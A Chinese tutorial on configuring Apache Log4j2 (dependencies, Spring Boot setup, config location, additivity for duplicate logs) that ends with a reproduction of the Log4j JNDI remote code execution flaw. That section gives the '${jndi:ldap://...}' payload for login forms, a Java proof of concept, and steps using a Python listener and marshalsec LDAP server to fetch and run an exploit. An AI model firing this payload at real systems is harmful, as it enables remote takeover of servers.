Apache Log4j 2是对Log4j的升级,它比其前身Log4j 1.x提供了重大改进,并提供了Logback中可用的许多改进,同时修复了Logback架构中的一些问题。是目前最优秀的Java日志框架,没有之一。
使用Log4j2 引用依赖在一般项目中使用Log4j2至少需要引用log4j-api-2.x和log4j-core-2.x这两个jar包。
org.apache.logging.log4j log4j-core 2.12.0 org.apache.logging.log4j log4j-api 2.12.0
在spring boot项目中使用Log4j2
添加配置文件org.springframework.boot spring-boot-starter-weborg.springframework.boot spring-boot-starter-loggingorg.springframework.boot spring-boot-starter-log4j2
默认情况下,Log4j2在classpath下查找名为log4j2.xml的配置文件。你也可以使用Java启动命令指定配置文件的全路径。-Dlog4j.configurationFile=opt/demo/log4j2.xml,你还可以使用Java代码指定配置文件路径
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.core.LoggerContext;
import java.io.File;
public static void main(String[] args) {
LoggerContext loggerContext = (LoggerContext) LogManager.getContext(false);
File file = new File("opt/demo/log4j2.xml");
loggerContext.setConfigLocation(file.toURI());
}
同步日志,混合日志和异步日志配置详解
Log4j2同步日志,混合日志和异步日志配置详解
配置文件详解Log4j2配置文件详解
日志重复打印问题如果Root中的日志包含了Logger中的日志信息,并且AppenderRef是一样的配置,则日志会打印两次。
这是log4j2继承机制问题,在Log4j2中,logger是有继承关系的,root是根节点,在log4j2中,有个additivity的属性,它是子Logger 是否继承 父Logger 的 输出源(appender) 的属性。具体说,默认情况下子Logger会继承父Logger的appender,也就是说子Logger会在父Logger的appender里输出。若是additivity设为false,则子Logger只会在自己的appender里输出,而不会在父Logger的appender里输出。
要打破这种传递性,也非常简单,在logger中添加 additivity = “false”,如下所示:
漏洞复现 Apache Log4j 远程代码执行%d{yyyy-MM-dd HH:mm:ss,SSS} [%t] %-5level %logger{0} - %msg%n
攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,经阿里云安全团队验证,Apache 、Apache Solr、Apache Druid、Apache Flink等均受影响
poc登录口账号密码测试一下
${jndi:ldap://xxxxx.dnslog.cn/exp}
poc代码
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class log4j {
private static final Logger logger = LogManager.getLogger(log4j.class);
public static void main(String[] args) {
logger.error("${jndi:ldap://127.0.0.1:1389/a}");
}
}
复现过程
打开python服务监听
将 exp代码放入监听路径下
使用marshalsec打开LADP服务
Log4j2 需要进行mvn安装依赖(环境如何搭建 自行百度)
修改IP
执行后会向LDAP服务器进行请求 并执行python监听服务下的exp
